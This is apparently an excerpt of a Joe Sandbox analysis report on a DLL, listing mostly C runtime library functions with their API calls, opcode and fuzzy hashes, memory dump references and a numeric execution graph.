              • Opcode Fuzzy Hash: 732f4b8291b87d0b2175d59baa47401adb536aab6eb0fd137d2c0658e741c184
              • Instruction Fuzzy Hash: 6721B7B6A41229A7DF119AA4DC80A5A37ADAB43774F300354FA19A73D0D738E913C6E1
              Function 6BEEFE17 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a4affad64b647bf277b385c99c66e85a525f10844aa6627147ca9be326d5e35a
              • Instruction ID: 6dace24ae2e092d6298fc0163d6a02b49e16d4a9ed967d7b4aff44ded53a66b2
              • Opcode Fuzzy Hash: a4affad64b647bf277b385c99c66e85a525f10844aa6627147ca9be326d5e35a
              • Instruction Fuzzy Hash: DBB10774E042499FDB01CFA8D890BAE7BB9BF46318F20419DE91597392C778D943CBA0
              Function 6BEE67A3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,6BEE6721,6BEE51C4,6BEE4B74), ref: 6BEE67B1
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6BEE67BF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6BEE67D8
              • SetLastError.KERNEL32(00000000,?,6BEE6721,6BEE51C4,6BEE4B74), ref: 6BEE682A
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: e7377e60da21a93dcdb9947176f7b1b1443f6d36a1f76f32e3b721b604ad7c4c
              • Instruction ID: 2cbdf94237c7e4eb31fcaf49609137a7c4293daef70d17aeaf8bc48c486a1877
              • Opcode Fuzzy Hash: e7377e60da21a93dcdb9947176f7b1b1443f6d36a1f76f32e3b721b604ad7c4c
              • Instruction Fuzzy Hash: 9701D43255D212AEAB0016B8AC967473B95FB4667CF31433DF612512F0EF1AC857C1B9
              Function 6BEF3DF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
              Download Yara Rule
              Strings
              • C:\Windows\system32\loaddll32.exe, xrefs: 6BEF3E14
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: C:\Windows\system32\loaddll32.exe
              • API String ID: 0-1062229814
              • Opcode ID: ded3f8c21e6461df9684a5a5c6a8c877069c66ffcc195c75d79801fcfb2aa2aa
              • Instruction ID: b8fee3ddbfee4919ceb1a04afb66f10bb65204c4175ead3395a8cd7141adc54b
              • Opcode Fuzzy Hash: ded3f8c21e6461df9684a5a5c6a8c877069c66ffcc195c75d79801fcfb2aa2aa
              • Instruction Fuzzy Hash: A721C031A04309AFDB219F75DC8095B77AFEF41368730855AE91897250E738EC63CBA2
              Function 6BEEE429 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,316303B8,6BEEC75A,?,00000000,6BEFC710,000000FF,?,6BEEE3C3,B586E81C,?,6BEEE397,?), ref: 6BEEE45E
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6BEEE470
              • FreeLibrary.KERNEL32(00000000,?,00000000,6BEFC710,000000FF,?,6BEEE3C3,B586E81C,?,6BEEE397,?), ref: 6BEEE492
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 04b82d5bf8392f359655dfbcd13c265c059b27ae5a2fcfa1e9efcc745d456bc8
              • Instruction ID: e218af63acb8951e4fa647a6a900a76635755f04a6cb7b7e0d338f313237a465
              • Opcode Fuzzy Hash: 04b82d5bf8392f359655dfbcd13c265c059b27ae5a2fcfa1e9efcc745d456bc8
              • Instruction Fuzzy Hash: 7101A235950A19BBDF118B50CC08FAE7BBDFB44714F104625F826A2290DB38D801CAA0
              Function 6BEF8CF4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
              Download Yara Rule
              APIs
              • __alloca_probe_16.LIBCMT ref: 6BEF8D79
              • __alloca_probe_16.LIBCMT ref: 6BEF8E42
              • __freea.LIBCMT ref: 6BEF8EA9
                • Part of subcall function 6BEF047E: RtlAllocateHeap.NTDLL(00000000,6BEF4371,7D32887D), ref: 6BEF04B0
              • __freea.LIBCMT ref: 6BEF8EBC
              • __freea.LIBCMT ref: 6BEF8EC9
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              • Opcode ID: d7d4bfe5acaf525338a89680b7da018613995372b7c72501a6a0737db3006e52
              • Instruction ID: ed5a476d506af7168feaf878b94606791f719d4a724a377b13d79c04755298fd
              • Opcode Fuzzy Hash: d7d4bfe5acaf525338a89680b7da018613995372b7c72501a6a0737db3006e52
              • Instruction Fuzzy Hash: 8151B572A00206EFEB114F66CC81EAB36AEEF85718F31456DFD14D6250E739DC62C660
              Function 6BEE78B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6BEE7863,?,?,00000001,?,?,?,6BEE7952,00000001,FlsFree,6BEFDCE0,FlsFree), ref: 6BEE78BF
              • GetLastError.KERNEL32(?,6BEE7863,?,?,00000001,?,?,?,6BEE7952,00000001,FlsFree,6BEFDCE0,FlsFree,?,?,6BEE6878), ref: 6BEE78C9
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6BEE78F1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: e4d7344decf3d80a19337009759a7b662bf7b7c126029881f08376ed68de5b19
              • Instruction ID: 07185dbae65f75843e6633be9cd50c49f515a44a82db695cad948756904bf4c0
              • Opcode Fuzzy Hash: e4d7344decf3d80a19337009759a7b662bf7b7c126029881f08376ed68de5b19
              • Instruction Fuzzy Hash: 3FE04F3468430EB7EF011A70EC06B493F6AAF41B44F308070FA0EE8192EB69D463D5A8
              Function 6BEF25E6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNEL32(316303B8,00000000,00000000,?), ref: 6BEF2649
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BEF289B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BEF28E1
              • GetLastError.KERNEL32 ref: 6BEF2984
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 645bdfdbcaf703caa415445000137a77293ea4f3e6cd21040eec0e0a41cec58a
              • Instruction ID: eea9ee77f1fa0ac37a4e8ae47c65b12bb0e48bab9328c1ef689e47554b433a08
              • Opcode Fuzzy Hash: 645bdfdbcaf703caa415445000137a77293ea4f3e6cd21040eec0e0a41cec58a
              • Instruction Fuzzy Hash: 70D16975D042999FCF05CFA8C880AEDBBB9FF09314F28816AE455AB351E734A946CB50
              Function 6BEE6883 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: d2ef2fcfa08cab07a60068094c01ebc37909509befd1c5ee313db48a312f3af5
              • Instruction ID: 9278f3363983327ae51e5042e11455b82848e12c66c4dd19108e8ffcfbfff2e2
              • Opcode Fuzzy Hash: d2ef2fcfa08cab07a60068094c01ebc37909509befd1c5ee313db48a312f3af5
              • Instruction Fuzzy Hash: 05510272A00702AFEB148F65C841B6A77B5FF44718F30456DDA15472A0EB3AE8A3C7B0
              Function 6BEF3694 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • GetLastError.KERNEL32 ref: 6BEF36F8
              • __dosmaperr.LIBCMT ref: 6BEF36FF
              • GetLastError.KERNEL32(?,?,?,?), ref: 6BEF3739
              • __dosmaperr.LIBCMT ref: 6BEF3740
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 0c49434107f1adf2201ef23b8f59de0fed83fc9a83f8d390396a1df39a1ed216
              • Instruction ID: c0742dea000de2b12f42e4f4bd084e5f863bf142917a27495539239e83d96cfa
              • Opcode Fuzzy Hash: 0c49434107f1adf2201ef23b8f59de0fed83fc9a83f8d390396a1df39a1ed216
              • Instruction Fuzzy Hash: 7E21DA71604205AFDB309FB5C88095BB7BDEF01368720865DE91997740D73CEC138BA2
              Function 6BEF49E8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6BEF49F0
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BEF4A28
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BEF4A48
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: dd6919b014582d8076a9900fcc1989a445e57d54395619ca5e6b5d542788ef0c
              • Instruction ID: 8d06a80680174a92215259c5c1cbad4c1829fa67e82f00248b9b25abbf8cf19f
              • Opcode Fuzzy Hash: dd6919b014582d8076a9900fcc1989a445e57d54395619ca5e6b5d542788ef0c
              • Instruction Fuzzy Hash: EE1126B6A009097F6B115BB69EC9C6F2EBDCEC62AC320402AF901D1201FB6CCF038175
              Function 6BEF9F4D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6BEED16B,00000000,00000000,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000), ref: 6BEF9F64
              • GetLastError.KERNEL32(?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?,?,?,6BEF2FB2,00000000), ref: 6BEF9F70
                • Part of subcall function 6BEF9F36: CloseHandle.KERNEL32(FFFFFFFE,6BEF9F80,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?,?), ref: 6BEF9F46
              • ___initconout.LIBCMT ref: 6BEF9F80
                • Part of subcall function 6BEF9EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6BEF9F27,6BEF85CE,?,?,6BEF29D8,?,00000000,00000000,?), ref: 6BEF9F0B
              • WriteConsoleW.KERNEL32(00000000,00000000,6BEED16B,00000000,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?), ref: 6BEF9F95
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 9f66d56b1d02a20b6ddecbb132e98efb5f6b809b93716b6d65474d50d18109a7
              • Instruction ID: b596129ca9fee8d9be0ebf60571222373f52587979f4dec35f617ab38b1289b0
              • Opcode Fuzzy Hash: 9f66d56b1d02a20b6ddecbb132e98efb5f6b809b93716b6d65474d50d18109a7
              • Instruction Fuzzy Hash: 87F01C3F550119BBCF221FD1DC08A9A3F6BFB493A5B104014FA5985130D736C821EB91
              Function 6BEEC7EE Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: __aulldiv
              • String ID: +$-
              • API String ID: 3732870572-2137968064
              • Opcode ID: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction ID: 92172682d664e1778ced58846db2e6d4903edcf480fcc7953dd04ca5bb50d6b9
              • Opcode Fuzzy Hash: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction Fuzzy Hash: 6EA1C131F44258AEDB14CE78C8507EE7FB5AB46728F248599E8A5AB380D339D503CB70
              Function 6BEE6E7F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6BEE6EA4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: f5c5c653899211d2c3f0c51b465975acb247b58a59ca5e43efa1b41fe6f978e6
              • Instruction ID: 07c59fc63bb1d3b56803c1f0135bc25db77e4cf88901a78061eb46decf4d5a73
              • Opcode Fuzzy Hash: f5c5c653899211d2c3f0c51b465975acb247b58a59ca5e43efa1b41fe6f978e6
              • Instruction Fuzzy Hash: 41413E71900209AFDF05CFA4CC81ADE7BB6FF48308F258199FA186B255D339D962DB61

              Execution Graph

              Execution Coverage:3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:2000
              Total number of Limit Nodes:29
              execution_graph 16477 6fe6e7f2 16492 6fe74512 16477->16492 16482 6fe6e80e 16484 6fe70444 ___free_lconv_mon 14 API calls 16482->16484 16483 6fe6e81a 16519 6fe6e84b 16483->16519 16486 6fe6e814 16484->16486 16488 6fe70444 ___free_lconv_mon 14 API calls 16489 6fe6e83e 16488->16489 16490 6fe70444 ___free_lconv_mon 14 API calls 16489->16490 16491 6fe6e844 16490->16491 16493 6fe7451b 16492->16493 16497 6fe6e803 16492->16497 16541 6fe6f552 16493->16541 16498 6fe749e8 GetEnvironmentStringsW 16497->16498 16499 6fe74a00 16498->16499 16512 6fe6e808 16498->16512 16500 6fe74945 __vfwprintf_l WideCharToMultiByte 16499->16500 16501 6fe74a1d 16500->16501 16502 6fe74a27 FreeEnvironmentStringsW 16501->16502 16503 6fe74a32 16501->16503 16502->16512 16504 6fe7047e __fread_nolock 15 API calls 16503->16504 16505 6fe74a39 16504->16505 16506 6fe74a52 16505->16506 16507 6fe74a41 16505->16507 16508 6fe74945 __vfwprintf_l WideCharToMultiByte 16506->16508 16509 6fe70444 ___free_lconv_mon 14 API calls 16507->16509 16510 6fe74a62 16508->16510 16511 6fe74a46 FreeEnvironmentStringsW 16509->16511 16513 6fe74a71 16510->16513 16514 6fe74a69 16510->16514 16511->16512 16512->16482 16512->16483 16516 6fe70444 ___free_lconv_mon 14 API calls 16513->16516 16515 6fe70444 ___free_lconv_mon 14 API calls 16514->16515 16517 6fe74a6f FreeEnvironmentStringsW 16515->16517 16516->16517 16517->16512 16520 6fe6e860 16519->16520 16521 6fe71658 __dosmaperr 14 API calls 16520->16521 16522 6fe6e887 16521->16522 16523 6fe6e88f 16522->16523 16532 6fe6e899 16522->16532 16524 6fe70444 ___free_lconv_mon 14 API calls 16523->16524 16540 6fe6e821 16524->16540 16525 6fe6e8f6 16526 6fe70444 ___free_lconv_mon 14 API calls 16525->16526 16526->16540 16527 6fe71658 __dosmaperr 14 API calls 16527->16532 16528 6fe6e905 16702 6fe6e92d 16528->16702 16530 6fe6ed88 ___std_exception_copy 39 API calls 16530->16532 16532->16525 16532->16527 16532->16528 16532->16530 16534 6fe6e920 16532->16534 16536 6fe70444 ___free_lconv_mon 14 API calls 16532->16536 16533 6fe70444 ___free_lconv_mon 14 API calls 16535 6fe6e912 16533->16535 16537 6fe6df26 __vfwprintf_l 11 API calls 16534->16537 16538 6fe70444 ___free_lconv_mon 14 API calls 16535->16538 16536->16532 16539 6fe6e92c 16537->16539 16538->16540 16540->16488 16542 6fe6f563 16541->16542 16543 6fe6f55d 16541->16543 16544 6fe7196f __dosmaperr 6 API calls 16542->16544 16563 6fe6f569 16542->16563 16545 6fe71930 __dosmaperr 6 API calls 16543->16545 16546 6fe6f57d 16544->16546 16545->16542 16547 6fe71658 __dosmaperr 14 API calls 16546->16547 16546->16563 16549 6fe6f58d 16547->16549 16548 6fe6ed44 CallUnexpected 39 API calls 16550 6fe6f5e7 16548->16550 16551 6fe6f595 16549->16551 16552 6fe6f5aa 16549->16552 16554 6fe7196f __dosmaperr 6 API calls 16551->16554 16553 6fe7196f __dosmaperr 6 API calls 16552->16553 16555 6fe6f5b6 16553->16555 16561 6fe6f5a1 16554->16561 16556 6fe6f5ba 16555->16556 16557 6fe6f5c9 16555->16557 16558 6fe7196f __dosmaperr 6 API calls 16556->16558 16559 6fe6f299 __dosmaperr 14 API calls 16557->16559 16558->16561 16562 6fe6f5d4 16559->16562 16560 6fe70444 ___free_lconv_mon 14 API calls 16560->16563 16561->16560 16564 6fe70444 ___free_lconv_mon 14 API calls 16562->16564 16563->16548 16565 6fe6f56e 16563->16565 16564->16565 16566 6fe7431d 16565->16566 16589 6fe74472 16566->16589 16571 6fe74360 16571->16497 16572 6fe7047e __fread_nolock 15 API calls 16573 6fe74371 16572->16573 16574 6fe74387 16573->16574 16575 6fe74379 16573->16575 16607 6fe7456d 16574->16607 16576 6fe70444 ___free_lconv_mon 14 API calls 16575->16576 16576->16571 16579 6fe743bf 16581 6fe70431 __dosmaperr 14 API calls 16579->16581 16580 6fe743da 16584 6fe74406 16580->16584 16587 6fe70444 ___free_lconv_mon 14 API calls 16580->16587 16582 6fe743c4 16581->16582 16583 6fe70444 ___free_lconv_mon 14 API calls 16582->16583 16583->16571 16585 6fe7444f 16584->16585 16618 6fe73f96 16584->16618 16586 6fe70444 ___free_lconv_mon 14 API calls 16585->16586 16586->16571 16587->16584 16590 6fe7447e __FrameHandler3::FrameUnwindToState 16589->16590 16591 6fe74498 16590->16591 16626 6fe7351f RtlEnterCriticalSection 16590->16626 16593 6fe74347 16591->16593 16596 6fe6ed44 CallUnexpected 39 API calls 16591->16596 16600 6fe740a4 16593->16600 16594 6fe744d4 16627 6fe744f1 16594->16627 16597 6fe74511 16596->16597 16598 6fe744a8 16598->16594 16599 6fe70444 ___free_lconv_mon 14 API calls 16598->16599 16599->16594 16601 6fe7150b __DllMainCRTStartup@12 39 API calls 16600->16601 16602 6fe740b6 16601->16602 16603 6fe740d7 16602->16603 16604 6fe740c5 GetOEMCP 16602->16604 16605 6fe740ee 16603->16605 16606 6fe740dc GetACP 16603->16606 16604->16605 16605->16571 16605->16572 16606->16605 16608 6fe740a4 41 API calls 16607->16608 16609 6fe7458d 16608->16609 16610 6fe745ca IsValidCodePage 16609->16610 16616 6fe74692 16609->16616 16617 6fe745e5 __fread_nolock 16609->16617 16612 6fe745dc 16610->16612 16610->16616 16611 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16613 6fe743b4 16611->16613 16614 6fe74605 GetCPInfo 16612->16614 16612->16617 16613->16579 16613->16580 16614->16616 16614->16617 16616->16611 16631 6fe74178 16617->16631 16619 6fe73fa2 __FrameHandler3::FrameUnwindToState 16618->16619 16690 6fe7351f 